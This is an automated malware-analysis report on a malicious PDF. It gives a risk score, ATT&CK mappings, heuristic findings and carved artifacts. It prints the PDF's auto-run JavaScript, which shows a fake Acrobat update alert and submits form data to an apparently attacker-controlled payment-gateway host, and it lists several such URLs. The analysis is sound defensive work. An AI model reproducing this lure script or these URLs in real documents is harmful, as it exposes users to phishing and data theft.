MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The PDF contains embedded JavaScript that automatically executes upon opening. This script displays a fake 'Adobe Acrobat Updater' alert to deceive the user into thinking an update is necessary. Subsequently, it uses the `submitForm` function to send data to the URL `https://secure.payment-gateway.microransom.us/XTW5WQk9XYzFkRTFVYUhRdlJrc3dUVXh6Tm5SamEwMXJRWFJIVVM5b2JWTTViMVJETVN0d1FqVklUUzl1ZHpkRlFsbEdVMUZLTkUxYVVXTnBNRXhEU0ZwMFprSktXbmRXVW00MVdITjZLMDUxWTFOYWFXSkVVa2RoY25OQlIwSkpSRkUxYlZJNGNtcHZZMGs5TFMweVF6aE9LM1ZEZEdwNWR6aHJNRU5QYld0MFdVdDNQVDA9LS0zNzM0YTZkNmE3ODQ1ZTEyYjFhN2RiZWNlNzllZGIyOGU4NTM0ZTFj?cid=876842574#FDF`. This behavior is consistent with credential harvesting or phishing attempts disguised as software updates.
Machine Learning
- Nyx PDF Classifier malicious score 0.9477
Heuristics 8
-
PDF auto-runs JavaScript form submission on open critical PDF_OPENACTION_JS_SUBMITFORMPDF uses /OpenAction to run JavaScript that calls submitForm() with an external HTTP(S) URL. Opening the document triggers the outbound submission path without requiring a normal link click.
-
PDF JavaScript shows fake Acrobat updater prompt high PDF_FAKE_ACROBAT_UPDATE_LUREPDF JavaScript displays Acrobat/update-themed language such as a document rendering engine update or remote connection to Adobe servers. When paired with JavaScript or external submission, this is a social-engineering lure rather than benign document text.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTONDocument contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
-
External URI info PDF_URIPDF contains an external URL action
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://secure.payment-gateway.microransom.us/XTW5WQk9XYzFkRTFVYUhRdlJrc3dUVXh6Tm5SamEwMXJRWFJIVVM5b2JWTTViMVJETVN0d1FqVklUUzl1ZHpkRlFsbEdVMUZLTkUxYVVXTnBNRXhEU0ZwMFprSktXbmRXVW00MVdITjZLMDUxWTFOYWFXSkVVa2RoY25OQlIwSkpSRkUxYlZJNGNtcHZZMGs5TFMweVF6aE9LM1ZEZEdwNWR6aHJNRU5QYld0MFdVdDNQVDA9LS0zNzM0YTZkNmE3ODQ1ZTEyYjFhN2RiZWNlNzllZGIyOGU4NTM0ZTFj?cid=876842574#FDF Referenced by PDF JavaScript
- https://secure.payment-gateway.microransom.us/XUm1kcU9XMW1iVzVLVFZreE5rUm5aaXRHYlVsWGJVcEdSREJhVFdSSFpYTk1SbGxNVEhZME9HOUtaR1ZyTVN0M2VWTkhhbnBpVUdoVk1sSXpaVEJuVURKb01GSlJXbWx5TUVSRlIxQXZibGRCUTBsb1JXRk9TbEJhVkUxT1pUUjFjSEIxVW1od01FWkJiVEkzUkVKU1QyZDFWVFpaYTBWcVNqVm1jMFozTkhsMFNrMUdlSHBXYmxoeVN6RlBXamt5V1dvNGIwSTRabEZKVEVjck5YZFJlVFJYYVhsdFJYbEtlRzF4VjJsWk1ESmxiUzgzU2xWSk1rODFlVWwzUTJkTExTMTNaMUpMWm01M2JIbHdaVXRVUjFOblFrSmFhamxuUFQwPS0tNjI1ZmZlMDdjMmI2NDQ0ODYxZWQwZTk5ODA3NWVkMzk5OWYxY2NlOQ==?cid=876842574Referenced by PDF JavaScript
- https://secure.payment-gateway.microransom.us/XWldreVVHTlZabE5ZV2tVck9XdFZhR2w2Ym5wMFZGcE9aVWRYV2paaVJGbFNSa1l5V1VOR1NXVjBkVWwyV1cxTk1tMXdZbXhoZG5SMlZscFVOMFZPWkRsRE5uTnVSemRIYzJjNFlqQkNkVUpKVGl0MlNXdGFRWGhCWW1KR2JEZGlVMDFRWVZOMVNURmtUR1JWYkd0NmIyeGhZV1VyUzFSME5YcFlaU3RuYlc1UFMySmhaVEUxSzBsdVp6aEpTMnhNTTJoU2RrcFlTVFJ3YnpSR01YVTJlbk50T1U0dlpWWjVOVkJNYkVoNlJsSk5jbUp4YTIxWVp6WlBUV1F6YUhaTUxTMVBPR0Z5YkVWb1FYRjNVVTFuYTJ4dVJ5OVFlWHBuUFQwPS0tOWEwMzE0MjQyNTQ3NTk2NDNiODAxZjI3MjEwOWUwMDg2ZWVmMDhhZA==?cid=876842574Referenced by PDF JavaScript
- https://secure.payment-gateway.microransom.us/XY2xGNlMydFROR0UzVlhZeVVHUktMMUJVT0ROWFJYZFZlRlJPTVRVM1owYzROSGsxU0cxbWRuSk1helJJUm1wMlpqTkxXRTlUWVZvMlpWZExTRGRoVkd0UE5reFlTeXRPZVVGWVVEVllhR3RIZEU5b00wWmtkVU5LUjNRdlpGTlZSMWhQTjBocVYzRTFTV3RZV0RkNlRTdEtkSFJIZUhkV2VsWkpXbUZJYXpaa1VrOVFUbEJsWlZkS1dFazVZbUpPTkdoRGRtVlhUVU5yU0RBMFZrcFlNVTk1VEc1YWNXOXFjbEpUVFhGV1VVeGpkbm8wTDBWWFlURnlMMFpHYkhORkxTMUtObVJQYXpCV1prNVZNRmhWYjBoblMzbFdhWFZuUFQwPS0tNTY1MDQ2ZTE1ZmVkMTdlOTNkNWQwN2Y2YzI0OTUyNTgzYThkODBiNA==?cid=876842574Referenced by PDF JavaScript
- https://secure.payment-gateway.microransom.us/XUm1kcU9XMW1iVzVLVFZreE5rUm5aaXRHYlVsWGJVcEdSREJhVFdSSFpYTk1SbGxNVEhZME9HOUtaR1ZyTVN0M2VWTkhhbnBpVUdoVk1sSXpaVEJuVURKb01GSlJXbWx5TUVSRlIxQXZibGRCUTBsb1JXRk9TbEJhVkUxT1pUUjFjSEIxVW1od01FWkJiVEkzUkVKU1QyZDFWVFpaYTBWcVNqVm1jMFozTkhsMFNrMUdlSHBXYmxoeVN6RlBXamt5V1dvNGIwSTRabEZKVEVjck5YZFJlVFJYYVhsdFJYbEtlRzF4VjJsWk1ESmxiUzgzU2xWSk1rODFlVWwzUTJkTExTMTNaMUpMWm01M2JIbHdaVXRVUjFOblFrSmFhamxuUFQwPS0tNjI1ZmZlMDdjMmI2NDQ0ODYxZWQwZTk5ODA3NWVkMzk5OWYxY2NlOQ==?cid=Referenced by PDF JavaScript
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by PDF JavaScript
- http://ns.adobe.com/xap/1.0/Referenced by PDF JavaScript
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/tiff/1.0/Referenced by PDF JavaScript
- http://ns.adobe.com/exif/1.0/Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x180A | 615 bytes |
SHA-256: c6f30ba5ee58e3af80da9821c1c61ba8f799636e5dfa4953d76577f441f4940b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://secure.payment-gateway.microransom.us/XTW5WQk9XYzFkRTFVYUhRdlJrc3dUVXh6Tm5SamEwMXJRWFJIVVM5b2JWTTViMVJETVN0d1FqVklUUzl1ZHpkRlFsbEdVMUZLTkUxYVVXTnBNRXhEU0ZwMFprSktXbmRXVW00MVdITjZLMDUxWTFOYWFXSkVVa2RoY25OQlIwSkpSRkUxYlZJNGNtcHZZMGs5TFMweVF6aE9LM1ZEZEdwNWR6aHJNRU5QYld0MFdVdDNQVDA9LS0zNzM0YTZkNmE3ODQ1ZTEyYjFhN2RiZWNlNzllZGIyOGU4NTM0ZTFj?cid=876842574#FDF');
}
docOpened();
|
|||
javascript_obj0012_001.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x1831 | 103902 bytes |
SHA-256: 92b86f1f701193b7e3f31cb11be58be5d6f0319fc4ab89bf51b4f2579e615344 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://secure.payment-gateway.microransom.us/XTW5WQk9XYzFkRTFVYUhRdlJrc3dUVXh6Tm5SamEwMXJRWFJIVVM5b2JWTTViMVJETVN0d1FqVklUUzl1ZHpkRlFsbEdVMUZLTkUxYVVXTnBNRXhEU0ZwMFprSktXbmRXVW00MVdITjZLMDUxWTFOYWFXSkVVa2RoY25OQlIwSkpSRkUxYlZJNGNtcHZZMGs5TFMweVF6aE9LM1ZEZEdwNWR6aHJNRU5QYld0MFdVdDNQVDA9LS0zNzM0YTZkNmE3ODQ1ZTEyYjFhN2RiZWNlNzllZGIyOGU4NTM0ZTFj?cid=876842574#FDF');
}
docOpened();
endstream
endobj
%QDF: ignore_newline
13 0 obj
483
endobj
%% Page 1
%% Original object ID: 16 0
14 0 obj
<<
/Annots 15 0 R
/Contents 16 0 R
/CropBox [
0
0
612
792
]
/MediaBox [
0
0
612
792
]
/Parent 8 0 R
/Resources <<
/Font <<
/C0_0 18 0 R
/C0_1 19 0 R
/C0_2 20 0 R
>>
/ProcSet [
/PDF
/Text
/ImageC
]
/XObject <<
/Im0 21 0 R
/Im1 23 0 R
/Im2 25 0 R
>>
>>
/Rotate 0
/Type /Page
>>
endobj
%% Original object ID: 32 0
15 0 obj
[
27 0 R
28 0 R
29 0 R
]
endobj
%% Contents for page 1
%% Original object ID: 18 0
16 0 obj
<<
/Length 17 0 R
>>
stream
q
404.8937073 0 0 269.9337463 107.3061676 460.5401001 cm
/Im0 Do
Q
BT
/C0_0 12 Tf
1 0 0.2679 1 116.07 441.387 Tm
<00350049004a005400010045005000440056004e0046004f00550001004a005400010046004f00440053005a0051005500460045000100560054004a004f0048000100220045005000430046000100340046004400560053004600010024004d005000560045>Tj
/C0_1 12 Tf
<00e4>Tj
/C0_0 12 Tf
<000f0001>Tj
4.179 -15.6 Td
<0024004d004a0044004c000100430046004d005000580001005500500001005400460044005600530046004d005a00010057004a00460058000100440050004f00550046004f00550054000f0001>Tj
ET
/TouchUp_TextEdit MP
BT
0 i
/C0_2 10 Tf
158.323 52.725 Td
<0031004d00460042005400460001004f005000550046001b000100340050004e00460001005800460043004e0042004a004d00010044004d004a0046004f0055005400010042005300460001004f00500055000100440050004e005100420055004a0043004d004600010058004a005500490001002200450050004300460001>Tj
0 -12 TD
<00340046004400560053004600010024004d00500056004500e4000f0001002a004700010055004900420055000100490042005100510046004f0054000d0001004500500058004f004d005000420045000100550049004600010047004a004d004600010042004f00450001005000510046004f00010050004f0001>Tj
T*
<002500460054004c005500500051000f>Tj
ET
q
56.1389923 0 0 43.9851837 94.3450775 23.5263672 cm
/Im1 Do
Q
q
157.0927124 0 0 36.2528992 230.401001 342.7270813 cm
/Im2 Do
Q
endstream
endobj
17 0 obj
1300
endobj
%% Original object ID: 40 0
18 0 obj
<<
/BaseFont /KUFUSM+HiraKakuProN-W6
/DescendantFonts 30 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 31 0 R
/Type /Font
>>
endobj
%% Original object ID: 42 0
19 0 obj
<<
/BaseFont /VGWIQQ+HiraKakuProN-W6
/DescendantFonts 33 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 34 0 R
/Type /Font
>>
endobj
%% Original object ID: 44 0
20 0 obj
<<
/BaseFont /JSIEEO+HiraKakuProN-W6
/DescendantFonts 36 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 37 0 R
/Type /Font
>>
endobj
%% Original object ID: 25 0
21 0 obj
<<
/BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter /DCTDecode
/Height 400
/Metadata 39 0 R
/Name /X
/Subtype /Image
/Type /XObject
/Width 600
/Length 22 0 R
>>
stream
���� JFIF �� JFIF �� C &""&0-0>>T�� C &""&0-0>>T�� � X " ��
�� � } !1A Qa "q 2��� #B�� R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
�� � w !1 AQ aq "2� B���� #3R� br�
$4�%� &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������� ? ��sKL� ^�����h�
... (truncated)
|
|||
font_00_cff_off00019703.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x19703 | 4575 bytes |
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.